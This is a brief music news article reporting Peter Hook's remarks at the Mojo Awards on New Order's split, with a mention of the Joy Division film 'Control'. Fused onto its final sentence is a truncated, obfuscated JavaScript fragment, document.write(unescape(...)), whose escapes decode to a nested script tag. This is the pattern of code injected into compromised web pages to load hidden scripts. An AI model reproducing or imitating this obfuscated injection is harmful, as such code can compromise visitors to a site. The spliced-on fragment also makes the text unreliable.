Peter Hook has been speaking about the split of New Order, admitting he is "sad" about the group's break-up report Launch.
The band's legendary bass player revealed that he, Bernard Sumner and Stephen Morris had no future plans to work together in an interview last month.
Earlier this week, he discussed the situation at the Mojo Awards in London, but refused to explain what exactly had happened, after a career spanning some 30 years.
He explained: "It has been very sad actually, and it has been very difficult to live with, but that is life, isn't it?
"But you pick yourself up, you dust yourself off, and you start all over again", Hook told the BBC, before admitting the reasons for the split were "personal".
Meanwhile, "Control", a film about the career of Joy Division and life of singer Ian Curtis, is due to hit cinemas shortly.
The movie, which is directed by Anton Corbijn, received a rapturous critical reception at the Cannes Film Festival in May.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
